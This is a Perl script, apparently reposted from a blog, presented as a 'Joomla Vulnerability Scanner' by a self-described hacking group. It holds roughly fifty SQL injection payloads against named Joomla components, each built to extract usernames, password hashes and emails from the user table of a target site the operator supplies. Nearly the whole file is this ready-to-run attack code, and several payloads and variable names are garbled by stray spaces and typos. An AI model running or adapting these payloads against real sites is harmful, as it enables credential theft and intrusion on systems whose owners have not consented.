#!/usr/bin/perl
########################################
#[~] Coded by : X-h4ck
#[~] Greetz : 4LiFe - IlyrianWarrior - Wulns~ - st3aler - cRu3l.b0y - Hack-Down - H3LL
#[!] Name : Joomla vulnerability scanner
#[!] Email : mem001@live.com
#h4ck0ff ~ sacred legion
#Pirate.AL
########################################
print q{
+---------------------------------------------------------------+
| h4ck0ff ~ sacred legion |
|/************************************************** ***********\|
| [x] Name : Joomla Vulnerability Scanner |
| [x] Coded by : X-h4ck |
| [x] E-mail : mem001[at]live[dot]com |
| [x] Site : www.Pirate.AL |
| [x] Greetz : 4LiFe - IllyrianWarrior - Wulns~ - st3aler |
| cRu3l.b0y - Hack-Down - H3LL |
+---------------------------------------------------------------+
########################################
Joomla Vulnerability Scanner
- SQLi scanner *remote v1 (2010 exploits)
########################################
};
use HTTP::Request;
use LWP::UserAgent;
###xpl###
$com_jeajaxeventcalendar="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4/**/from/**/jos_users--";
$com_storedirectory="UNION SELECT
1,2,concat_ws(0x3a,username,email,password),4,5,6,
7,8,9,10,11,12,13,14,15,16,17,18 from jos_users";
$com_annuaire="/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13/**/from/**/jos_users--";
$com_maianmedia="+union+all+select+1,2,group_conca
t(username,char(58),password),4,5,6,7,8,9,10,11,12
,13,14,15,16,17+from+jos_users--";
$com_alfurqan15x="+UNION+ALL+SELECT+1,concat_ws(0x 3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_u sers--";
$com_markt="+union+select+0,1,password,3,4,5,usern ame,7,8+from+jos_users--";
$com_sponsorwall="+and+1=0+union+select+1,2,concat (username,0x3a,password)fl0rix,4,5,6,6,7,8,9,10+fr om+jos_users--";
$com_flipwall="+union+select+1,2,3,4,5,concat(user name,0x3a,password)fl0rix,7,8,9,10+from+jos_users--";
$jedirectory="+1+union+select+1,2,concat(0x23,0x23
,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),4,5,6
,7,8,9,10,11+from+jos_users+where+id=userid--";
$com_ezautos="+and+0+union+select+1,2,concat(usern
ame,0x3a,password),4,5,6,7+from+%23__users+where+g
id=25+or+gid=24+and+block%3C%3E1--";
$com_arash="+and 1=0 UNION SELECT
1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30 from
jos_users";
$com_taxes="+union+all+select+1,group_concat(usern
ame,0x3a,password,0x3a,email,0x3a,usertype),3,4,5,
6,7,8,9,10,11+from+jos_users--";
$com_vat="+union+all+select+1,group_concat(usernam e,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_user s--";
$com_blogs="/**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/
0,1,2,3,version(),database(),concat(username,0x3a, password) /**/ from
/**/ jos_users--";
$com_gr="+union+select+1,concat(username,0x3a,pass word)+from+jos_users--";
$com_simpleshop="UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,concat(username,0x3e,password,0
x3e,usertype,0x3e,lastvisitdate)+from+jos_users--";
$com_youtube="union+select+1,concat(username,0x3a, email),3,4,5,6,7,8+from+jos_users--";
$com_joomdle="-999.9'+UNION+ALL+SELECT+1,2,3,4,5,group_concat(use
rname,0x3a,password),7,8,9,10,11,12,13,14,15,16,17
,18+from+mdl_user--+and+'kaMtiEz'='kaMtiEz";
$com_itaromry="?filter_search=&filter_level=1&filt
er_race=*&filter_class=8+and+1=2+union+all+select+
1,2,3,4,5,6,concat(username,0x3a,password),8,9,10,
11+from+jos_users--+";
$com_iproperty="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,group_concat(username,char(5
8),password)v3n0m/**/from/**/jos_users--";
$com_huruhelpdesk="/**/union/**/select/**/1,2,3,concat%28username,0x3a,password%29,5,6,7+fro m+jos_users--";
$com_jomtube="+union+select+1,2,3,4,5,6,7,8,9,10,1
1,12,group_concat(username,0x3a,password),14,15,16
,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube";
$com_spa="%20UNION%20SELECT%201,2,3,4,concat(usern ame,0x3a,password),6,7,8,9,10,11,12,13%20from%20jo s_users--";
$com_staticxt="+union select+concat_ws(0x3a,username,password),2,3,4,5,6 ,7,8,9,10,11,12+from+jos_users";
$com_ybggal="+and+1=2+union+all+select+1,group_con cat(username,char(58),password)v3n0m,3,4,5+from+jo s_users--";
$com_quran="/**/UNION/**/SELECT/**/1,group_concat(username,0x3a,password,0x3a,email,0
x3a,activation,0x3c62723e)r3m1ck,3,4,5/**/FROM/**/jos_users--";
$com_konsultasi="/**/union/**/select/**/all/**/1,2,3,4,concat(username,0x3a,password)c4uR,6,7,8,9/**/from/**/jos_users--";
$com_newsfeeds="%20union%20select%201,concat%28use
rname,char%2858%29,password%29,3,4,5,6,7,8,9,10,11
,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2
8,29,30%20from%20jos_users--";
$wapmain="+union+select+1,2,3,concat(username,0x3a
,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0 ,1--";
$com_abc="+union+select+1,group_concat(0x3a,userna me,0x3a,password,0x3a)+from+jos_users--";
$com_joomradio="+union+select+1,group_concat(usern ame,0x3a,password),3,4,5,6,7+from+jos_users--";
$com_jtm="/**/union/**/all/**/select/**/concat_ws(0x3a,username,password)/**/from/**/jos_users--&task=search";
$com_gbufacebook="+UNION+ALL+SELECT+1,concat_ws(0x
3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14
,15,16+from+jos_users--+and+'kaMtiEz'='kaMtiEz";
$com_manager="/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,group_concat(username,char(5
8),password)v3n0m/**/from/**/jos_users--";
$com_jp_jobs="/**/union/**/all/**/select/**/1,2,group_concat(username,char(58),password)v3n0m,
4,5,6,7,8,9,10,11,12,13,14/**/from/**/jos_users--";
$com_sermonspeaker="/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/**/";
$com_jdrugstopic="+UNION+SELECT+1,concat(username, 0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+jos_ users--";
$com_mv_restaurantmenumanager="+and+1=2+union+sele
ct+1,2,group_concat(username,0x3a,password),4,5,6,
7,8,9,10,11,12+from+jos_users";
$com_articles="+union+select+1,2,3,4,5,concat(user name,0x3a,password),7,8,9,10+from+jos_users—-";
$com_dcs_flashgames="+union+all+select+1,2,user(), 4,@@version,6,concat_ws(0x3a,username,password)+fr om+jos_users--";
$com_bidding="+UNION ALL SELECT
1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21 from jos_users--";
$com_acteammember="+UNION+SELECT+1,2,3,4,5,concat(
username,0x20,password),7,8,9,10,11,12,13,14,15+fr
om+mos_users--&Itemid=121&lang=en";
$com_acstartseite="+and+1=2+union+select+1,2,conca
t(username,0x20,password),4,5,6,7,8,9,10,11,12,13,
14,15,16,17+from+mos_users***12296;=de";
$com_productbook="+UNION all SELECT
1,2,3,concat(username,0x3a,password,0x3a,email),5,
6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,
24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40
,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5
7,58+from+condev.jos_users--";
$com_yelp="+UNION+ALL+SELECT+1,2,3,concat_ws(0x3a3
a3a,username,password),5,6,concat_ws(0x3a3a3a,user
name,password),8,9,10,11,12,13,14,15,16,17+FROM+jo s_users--";
$com_dms="+union+all+select+666,666,666,666,666,66
6,666,concat_ws(0x3a,username,password),666,666,66
6,666,666,666,666,666,666,666,666,666,666+from+jos _users--";
$com_jbpublishdownfp="+union+all+select+concat(use rname,0x3A3A3A,password)+from+jos_users";
$com_casino="+union+all+select+1,username,password ,4,5+from+jos_users/*";
$com_doqment="/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--";
$com_alfresco="/**/union/**/select/**/1,2,3,concat(username,0x3a,password)fl0rixf0r3v3r,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/**/from/**/jos_users--";
$com_countries="/**/union/**/select/**/concat(username,0x3a,password)fl0f0r3v3r/**/from/**/jos_users";
print "\nWeb page: http://wwww.site.com/ : ";
chomp(my $target=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
$host = $target .
"/index.php?option=com_jeajaxeventcalendar&view=alle
ventlist_more&event_id=-999 .$com_jeajaxeventcalendar.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
print "[*] Results : CHECK : \n";
print "Joomla JE Ajax Event Component (com_jeajaxeventcalendar) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_storedirectory&task=view&id=-999 .$com_storedirectory.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){
print "[*] Results : CHECK : \n";
print "Joomla Component (com_storedirectory) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_annuaire&view=annuaire&type=c at&id=-999 .$com_annuaire.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla (com_annuaire) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_maianmedia&view=music&cat=-999 .$com_maianmedia.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_maianmedia) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&s urano=-999 .$com_alfurqan15x.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_alfurqan15x) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_markt&page=show_category&cati d=999 .$com_markt.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_markt) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_sponsorwall&controller=sponso rwall&catid=9999 .$com_sponsorwall.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_sponsorwall) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_flipwall&controller=flipwall& catid=999 .$com_flipwall.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_flipwall) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_jedirectory&view=item&catid=9 99 .$jedirectory.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla JE Directory SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_ezautos&Itemid=999&id=1&task= helpers&firstCode=999 .$com_ezautos.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_ezautos) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_arash&id=999 .$com_arash.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_arash) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_taxes&id=-999 .$com_taxes.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_taxes) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_vat&id=-999 .$com_vat.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_vat) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_blogs&task=details&b_id=999 .$com_blogs.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_blogs) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_blogs&task=details&b_id=-999 .$com_gr.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_gr) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_simpleshop&Itemid=xx&task=vie wprod&id=-999 .$com_simpleshop.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_simpleshop) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_youtube&id_cate=999 .$com_youtube.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_youtube) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_joomdle&view=detail&cat_id=1& course_id=.$com_joomdle.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_joomdle) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_itarmory&view=guildmembers&It emid=.$com_itarmory.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_itarmory) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_iproperty&view=agentpropertie s&id=-999999 .$com_iproperty.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_iproperty) SQL Injection Vulnerability ! \n\n";
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=999 .$com_huruhelpdesk.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?view=videos&type=member&user_id=-999 .$com_jomtube.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_jomtube) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_spa&view=spa_read_more&pid=-999 .$com_spa.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_spa) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_staticxt&staticfile=test.php& id=-999 .$com_staticxt.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_staticxt) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_ybggal&Itemid=999&catid=999 .$com_ybggal.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_ybggal) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_quran&action=viewayat&surano= 999 .$com_quran.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_quran) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_konsultasi&act=detail&sid=999 .$com_konsultasi.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_konsultasi) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_newsfeeds&view=categories&fee did=-999 .$com_newsfeeds.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_newsfeeds) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/wap/wapmain.php?option=onews&action=link&id=-999 .$wapmain.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (wapmain.php) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_abc&view=abc&letter=AS§io nid=-999 .$com_abc.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_abc) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index2.php?option=com_joomradio&page=show_video&id =-999 .$com_joomradio.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_joomradio) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_jtm&view=search&view=search&a uthor=-999 .$com_jtm.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component JTM Reseller SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_gbufacebook&task=show_face&fa ce_id=-999 .$com_gbufacebook.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_gbufacebook) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_manager&view=flight&Itemid=99 9 .$com_manager.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_manager) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_jp_jobs&view=detail&id=-999 .$com_jp_jobs.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_jp_jobs) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_sermonspeaker&task=latest_ser mons&id=-999 .$com_sermonspeaker.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_sermonspeaker) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_jdrugstopics&view=drugsdetail s&id=-999 .$com_jdrugstopics.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_jdrugstopics) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target .
"/index.php?option=com_mv_restaurantmenumanager&task
=menu_display&Venue=1&mid=999 .$com_mv_restaurantmenumanager.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_mv_restaurantmenumanager) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_articles&task=view_addarticle s&sid=999 .$com_articles.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_articles) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_dcs_flashgames&Itemid=61&cati d=999 .$com_dcs_flashgames.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_dcs_flashgames) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_bidding&id=-999 .$com_bidding.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_bidding) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_acteammember&id=-999 .$com_acteammember.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_acteammember) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_acstartseite&Itemid=999 .$com_acstartseite.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_acstartseite) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_productbook&Itemid=999&func=d etail&id=-999 .$com_productbook.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_productbook) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_yelp&controller=showdetail&ta sk=showdetail&cid=-999 .$com_yelp.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_yelp&controller=showdetail&ta sk=showdetail&cid=-999 .$com_yelp.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_yelps) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_dms&task=view_category&catego ry_id=-999 .$com_dms.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_dms) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-999 .$com_jbpublishdownfp.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_jbpublishdownfp) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (compatible; MSIE 7.0; Windows)');
$host = $target . "/administrator/index.php?option=com_casino&task=category&id=-999 .$com_casino.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_casino) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_doqment&cid=-999 .$com_doqment.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_doqment) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_alfresco&task=edit&id_pan=999 .$com_alfresco.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_alfresco) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
$host = $target . "/index.php?option=com_countries&locat=999 .$com_countries.";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-f]{32})/){+
print "[*] Results : CHECK : \n";
print "Joomla Component (com_countries) SQL Injection Vulnerability ! \n\n"
}
else{print "\n[-] Error\n";
}
print q{
################################################## ###
#X-h4ck
#h4ck0ff ~ sacred legion
#www.Pirate.AL
################################################## ###
};
Nenhum comentário:
Postar um comentário